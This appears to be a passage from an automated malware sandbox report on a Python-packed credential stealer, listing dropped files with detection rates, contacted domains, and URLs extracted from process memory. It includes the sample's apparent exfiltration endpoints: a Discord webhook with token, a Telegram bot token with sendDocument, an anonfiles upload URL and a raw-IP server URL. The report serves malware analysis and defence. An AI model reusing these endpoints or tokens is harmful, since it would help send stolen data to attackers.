C:\Users\user\AppData\Local\Temp\_MEI66162\python310.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI66162\s.exe	21%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI66162\select.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI66162\unicodedata.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI66642\VCRUNTIME140.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI66642\_bz2.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI66642\_ctypes.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI66642\_decimal.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI66642\_hashlib.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI66642\_lzma.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI66642\_queue.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI66642\_socket.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI66642\_sqlite3.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI66642\_ssl.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI66642\libcrypto-1_1.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI66642\libffi-7.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI66642\libssl-1_1.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI66642\python310.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI66642\rar.exe	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI66642\select.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI66642\sqlite3.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI66642\unicodedata.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	92%	ReversingLabs	ByteCode-MSIL.Trojan.Whispergate
C:\Users\user\AppData\Local\Temp\wxyubnjmnlae.tmp	92%	ReversingLabs	Win64.Trojan.SilentCryptoMiner
C:\Users\user\Desktop\AwjkpWnj.log	12%	ReversingLabs
C:\Users\user\Desktop\BLFrfvoX.log	12%	ReversingLabs
C:\Users\user\Desktop\EqAsTbqX.log	17%	ReversingLabs
C:\Users\user\Desktop\FuissdNI.log	12%	ReversingLabs
C:\Users\user\Desktop\GLhaJjhM.log	12%	ReversingLabs
C:\Users\user\Desktop\IsmZtopJ.log	12%	ReversingLabs
C:\Users\user\Desktop\JSejfBbH.log	8%	ReversingLabs
C:\Users\user\Desktop\JmBJbHgR.log	17%	ReversingLabs
C:\Users\user\Desktop\JryrolxS.log	12%	ReversingLabs
C:\Users\user\Desktop\KWThvPSL.log	12%	ReversingLabs

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Link
discord.com	0%	Virustotal	Browse
ip-api.com	0%	Virustotal	Browse
api.telegram.org	2%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label	Link
https://www.avito.ru/	0%	URL Reputation	safe
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0	0%	URL Reputation	safe
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0	0%	URL Reputation	safe
https://www.leboncoin.fr/	0%	URL Reputation	safe
https://weibo.com/	0%	URL Reputation	safe
https://www.msn.com	0%	URL Reputation	safe
https://nuget.org/nuget.exe	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
https://www.amazon.ca/	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
http://schemas.xmlsoap.org/soap/encoding/	0%	URL Reputation	safe
http://www.apache.org/licenses/LICENSE-2.0.html	0%	URL Reputation	safe
https://www.amazon.com/	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s	0%	URL Reputation	safe
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	0%	URL Reputation	safe
https://MD8.mozilla.org/1/m	0%	URL Reputation	safe
https://bugzilla.mo	0%	URL Reputation	safe
http://schemas.xmlsoap.org/wsdl/	0%	URL Reputation	safe
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples	0%	URL Reputation	safe
http://ocsp.sectigo.com0	0%	URL Reputation	safe
https://www.python.org/download/releases/2.3/mro/.	0%	URL Reputation	safe
https://contoso.com/License	0%	URL Reputation	safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	URL Reputation	safe
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17	0%	URL Reputation	safe
http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#	0%	URL Reputation	safe
https://account.bellmedia.c	0%	URL Reputation	safe
http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6	0%	URL Reputation	safe
https://login.microsoftonline.com	0%	URL Reputation	safe
http://crl.thawte.com/ThawteTimestampingCA.crl0	0%	URL Reputation	safe
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install	0%	URL Reputation	safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0%	URL Reputation	safe
https://contoso.com/	0%	URL Reputation	safe
https://support.mozilla.org/products/firefoxgro.all	0%	URL Reputation	safe
http://nuget.org/NuGet.exe	0%	URL Reputation	safe
https://sectigo.com/CPS0	0%	URL Reputation	safe
http://ocsp.thawte.com0	0%	URL Reputation	safe
https://www.wykop.pl/	0%	URL Reputation	safe
https://twitter.com/	0%	URL Reputation	safe
https://www.olx.pl/	0%	URL Reputation	safe
https://support.mozilla.org/products/firefox	0%	URL Reputation	safe
https://github.com/Blank-c/BlankOBF	0%	Avira URL Cloud	safe
https://duckduckgo.com/chrome_newtab	0%	Avira URL Cloud	safe
https://duckduckgo.com/ac/?q=	0%	Avira URL Cloud	safe
https://ac.ecosia.org/autocomplete?q=	0%	URL Reputation	safe
https://www.amazon.fr/	0%	URL Reputation	safe
https://api.telegram.org/bot%s/%s	0%	Avira URL Cloud	safe
https://www.openssl.org/H	0%	URL Reputation	safe
https://aka.ms/pscore68	0%	URL Reputation	safe
https://python.org/dev/peps/pep-0263/	0%	Avira URL Cloud	safe
https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#	0%	Avira URL Cloud	safe
http://www.microsoftCHROME~2.TXTy./	0%	Avira URL Cloud	safe
https://duckduckgo.com/ac/?q=	0%	Virustotal		Browse
https://tools.ietf.org/html/rfc2388#section-4.4	0%	Avira URL Cloud	safe
https://github.com/Blank-c/BlankOBF	2%	Virustotal		Browse
https://api.telegram.org/bot%s/%s	0%	Virustotal		Browse
https://python.org/dev/peps/pep-0263/	0%	Virustotal		Browse
https://api.anonfiles.com/upload	0%	Avira URL Cloud	safe
https://tools.ietf.org/html/rfc2388#section-4.4	0%	Virustotal		Browse
https://discord.com/api/v9/users/	0%	Avira URL Cloud	safe
https://api.anonfiles.com/upload	1%	Virustotal		Browse
https://github.com/urllib3/urllib3/issues/2192#issuecomment-821832963	0%	Avira URL Cloud	safe
http://www.microsoftISPLA~1.PNGy.	0%	Avira URL Cloud	safe
https://discord.com/api/v9/users/	0%	Virustotal		Browse
http://json.org	0%	Avira URL Cloud	safe
https://github.com/urllib3/urllib3/issues/2192#issuecomment-821832963	0%	Virustotal		Browse
https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#	0%	Virustotal		Browse
https://duckduckgo.com/chrome_newtab	0%	Virustotal		Browse
https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxy	0%	Avira URL Cloud	safe
https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688	0%	Avira URL Cloud	safe
https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader	0%	Avira URL Cloud	safe
http://crl.mic	0%	Avira URL Cloud	safe
http://json.org	0%	Virustotal		Browse
https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxy	0%	Virustotal		Browse
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	Avira URL Cloud	safe
https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688	0%	Virustotal		Browse
https://httpbin.org/	0%	Avira URL Cloud	safe
https://github.com/Pester/Pester	0%	Avira URL Cloud	safe
http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535	0%	Avira URL Cloud	safe
https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy	0%	Avira URL Cloud	safe
https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader	0%	Virustotal		Browse
http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535	0%	Virustotal		Browse
http://tools.ietf.org/html/rfc6125#section-6.4.3	0%	Avira URL Cloud	safe
https://google.com/mail	0%	Avira URL Cloud	safe
https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy	0%	Virustotal		Browse
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	Virustotal		Browse
https://discord.com/api/webhooks/1264025291794157628/Sz1WQEp-Y2XqBUw8OiovYJ-HSmiCmR36z5iq2VLDwzDIXt2tsN2CAivzv3lJ-Ow3IUya	0%	Avira URL Cloud	safe
https://httpbin.org/	1%	Virustotal		Browse
https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py	0%	Avira URL Cloud	safe
http://tools.ietf.org/html/rfc6125#section-6.4.3	0%	Virustotal		Browse
https://www.google.com/	0%	Avira URL Cloud	safe
https://foss.heptapod.net/pypy/pypy/-/issues/3539	0%	Avira URL Cloud	safe
https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.	0%	Avira URL Cloud	safe
https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py	0%	Virustotal		Browse
https://www.google.com/	0%	Virustotal		Browse
http://google.com/	0%	Avira URL Cloud	safe
https://foss.heptapod.net/pypy/pypy/-/issues/3539	0%	Virustotal		Browse
https://discordapp.com/api/v9/users/	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
discord.com	162.159.136.232	true	true	0%, Virustotal, Browse	unknown
ip-api.com	208.95.112.1	true	false	0%, Virustotal, Browse	unknown
api.telegram.org	149.154.167.220	true	true	2%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://discord.com/api/webhooks/1264025291794157628/Sz1WQEp-Y2XqBUw8OiovYJ-HSmiCmR36z5iq2VLDwzDIXt2tsN2CAivzv3lJ-Ow3IUya	true	Avira URL Cloud: safe	unknown
http://194.58.42.154/9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://api.telegram.org/bot7006262545:AAG_Oybxah5yJgAPFw9HTnZfJtepO5xBob8/sendDocument	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	based.exe, 00000004.00000003.2357805259.00000201D0F0D000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://github.com/Blank-c/BlankOBF	based.exe, 00000004.00000003.1697774111.00000201D0741000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1698372056.00000201D0741000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1697774111.00000201D075D000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1699291343.00000201D07D4000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1697523584.00000201D0948000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1698004451.00000201D07C8000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1701839731.00000201D07D7000.00000004.00000020.00020000.00000000.sdmp	false	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://api.telegram.org/bot%s/%s	based.exe, 00000004.00000002.2382322398.00000201D0640000.00000004.00001000.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.avito.ru/	based.exe, 00000004.00000002.2386609527.00000201D1074000.00000004.00001000.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://duckduckgo.com/ac/?q=	based.exe, 00000004.00000003.2357805259.00000201D0F0D000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0	based.exe, 00000002.00000002.2420679707.000001F9199F8000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
https://python.org/dev/peps/pep-0263/	hacn.exe, 00000003.00000002.1735603222.00007FFDFB78F000.00000002.00000001.01000000.0000000B.sdmp, based.exe, 00000004.00000002.2394342718.00007FFDFB31F000.00000040.00000001.01000000.0000000D.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#	hacn.exe, 00000003.00000003.1702646810.000002075AFC0000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000003.00000003.1698210194.000002075AF96000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000003.00000003.1698482163.000002075AFB9000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000003.00000003.1690264827.000002075AFF3000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000003.00000003.1697979397.000002075AF85000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000003.00000003.1690516495.000002075AFFB000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000003.00000003.1697848796.000002075AF70000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000003.00000002.1704210713.000002075AFC4000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000003.00000003.1690417283.000002075AFFB000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1696082314.00000201CE329000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1692503685.00000201CE329000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000002.2381065768.00000201CE28F000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1691876118.00000201CE32B000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1691548082.00000201CE308000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.leboncoin.fr/	based.exe, 00000004.00000002.2386609527.00000201D10B4000.00000004.00001000.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.microsoftCHROME~2.TXTy./	based.exe, 00000004.00000003.2379777506.00000201D0C46000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000002.2383500151.00000201D0C46000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://tools.ietf.org/html/rfc2388#section-4.4	based.exe, 00000004.00000002.2381065768.00000201CE28F000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://weibo.com/	based.exe, 00000004.00000002.2386609527.00000201D10C0000.00000004.00001000.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.anonfiles.com/upload	based.exe, 00000004.00000002.2382322398.00000201D0640000.00000004.00001000.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.msn.com	based.exe, 00000004.00000002.2386609527.00000201D1114000.00000004.00001000.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://nuget.org/nuget.exe	powershell.exe, 00000011.00000002.1984485852.0000028A4B4B3000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://discord.com/api/v9/users/	based.exe, 00000004.00000003.1818589198.00000201D0852000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://github.com/urllib3/urllib3/issues/2192#issuecomment-821832963	based.exe, 00000004.00000002.2383024745.00000201D0940000.00000004.00001000.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.microsoftISPLA~1.PNGy.	based.exe, 00000004.00000003.2379777506.00000201D0C46000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000002.2383500151.00000201D0C46000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000011.00000002.1879607528.0000028A3B441000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.amazon.ca/	based.exe, 00000004.00000002.2386609527.00000201D1074000.00000004.00001000.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://json.org	based.exe, 00000004.00000002.2382426374.00000201D075A000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1818589198.00000201D0852000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxy	based.exe, 00000004.00000002.2383270970.00000201D0BF5000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000002.2383124519.00000201D0A44000.00000004.00001000.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688	hacn.exe, 00000003.00000002.1704402045.000002075C83C000.00000004.00001000.00020000.00000000.sdmp, based.exe, 00000004.00000002.2381279282.00000201CFC48000.00000004.00001000.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000011.00000002.1879607528.0000028A3B669000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 00000011.00000002.1879607528.0000028A3B669000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000011.00000002.1879607528.0000028A3B669000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader	hacn.exe, 00000003.00000003.1699100355.000002075AFF3000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000003.00000003.1702646810.000002075AFC0000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000003.00000003.1698210194.000002075AF96000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000003.00000003.1700843802.000002075AFFB000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000003.00000003.1698482163.000002075AFB9000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000003.00000003.1690999931.000002075AFE3000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000003.00000003.1690264827.000002075AFF3000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000003.00000003.1697979397.000002075AF85000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000003.00000003.1690516495.000002075AFFB000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000003.00000003.1696726978.000002075AFD9000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000003.00000003.1701432370.000002075AFFC000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000003.00000003.1698584471.000002075AFEC000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000003.00000003.1697785294.000002075AFE9000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000003.00000002.1704358371.000002075AFFD000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000003.00000003.1701967125.000002075AFFD000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000003.00000003.1697848796.000002075AF70000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000003.00000002.1704210713.000002075AFC4000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000003.00000003.1690417283.000002075AFFB000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1696082314.00000201CE329000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1692503685.00000201CE329000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000002.2381065768.00000201CE28F000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.amazon.com/	based.exe, 00000004.00000002.2386609527.00000201D1074000.00000004.00001000.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://crl.mic	powershell.exe, 00000011.00000002.2043962328.0000028A53BF7000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contoso.com/Icon	powershell.exe, 00000011.00000002.1984485852.0000028A4B4B3000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	based.exe, 00000004.00000003.2357805259.00000201D0F0D000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://httpbin.org/	based.exe, 00000004.00000002.2382103514.00000201D04D7000.00000004.00000020.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s	based.exe, 00000002.00000003.1685896467.000001F919A10000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	based.exe, 00000004.00000002.2387215842.00000201D157E000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.2357805259.00000201D0F1C000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000002.2387215842.00000201D1569000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.ecosia.org/newtab/	based.exe, 00000004.00000003.2357805259.00000201D0F0D000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	based.exe, 00000004.00000003.1793100098.00000201D0D3C000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1755320841.00000201D0C99000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://github.com/Pester/Pester	powershell.exe, 00000011.00000002.1879607528.0000028A3B669000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535	based.exe, 00000004.00000003.1871128429.00000201D0905000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000002.2382843962.00000201D0905000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1857154542.00000201D0905000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1818589198.00000201D0905000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.2359818591.00000201D0905000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.2380585995.00000201D0905000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.2376943014.00000201D0905000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000002.2383270970.00000201D0BE0000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.2380067127.00000201D0905000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy	hacn.exe, 00000003.00000003.1702646810.000002075AFC0000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000003.00000003.1698210194.000002075AF96000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000003.00000003.1698482163.000002075AFB9000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000003.00000003.1690264827.000002075AFF3000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000003.00000003.1697979397.000002075AF85000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000003.00000003.1690516495.000002075AFFB000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000003.00000003.1697848796.000002075AF70000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000003.00000002.1704210713.000002075AFC4000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000003.00000003.1690417283.000002075AFFB000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1696082314.00000201CE329000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1692503685.00000201CE329000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000002.2381065768.00000201CE28F000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1691876118.00000201CE32B000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1691548082.00000201CE308000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://MD8.mozilla.org/1/m	based.exe, 00000004.00000002.2386609527.00000201D10C0000.00000004.00001000.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://bugzilla.mo	based.exe, 00000004.00000002.2386609527.00000201D10C0000.00000004.00001000.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tools.ietf.org/html/rfc6125#section-6.4.3	based.exe, 00000004.00000002.2383124519.00000201D0A44000.00000004.00001000.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 00000011.00000002.1879607528.0000028A3B669000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://google.com/mail	based.exe, 00000004.00000003.1856925245.00000201D04D7000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1868825454.00000201D04D7000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000002.2382103514.00000201D04D7000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples	based.exe, 00000004.00000003.2358410623.00000201D0E91000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py	based.exe, 00000004.00000003.1691548082.00000201CE308000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.google.com/	based.exe, 00000004.00000002.2386609527.00000201D10C0000.00000004.00001000.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://foss.heptapod.net/pypy/pypy/-/issues/3539	based.exe, 00000004.00000002.2383024745.00000201D0940000.00000004.00001000.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.	based.exe, 00000004.00000003.1857154542.00000201D080A000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000002.2382426374.00000201D080A000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000002.2383270970.00000201D0BF5000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://google.com/	based.exe, 00000004.00000003.1857154542.00000201D080A000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000002.2382426374.00000201D080A000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://ocsp.sectigo.com0	based.exe, 00000002.00000002.2420679707.000001F9199F8000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1685896467.000001F919A10000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.python.org/download/releases/2.3/mro/.	hacn.exe, 00000003.00000002.1724401558.000002075D178000.00000004.00001000.00020000.00000000.sdmp, based.exe, 00000004.00000002.2382218534.00000201D0540000.00000004.00001000.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/License	powershell.exe, 00000011.00000002.1984485852.0000028A4B4B3000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
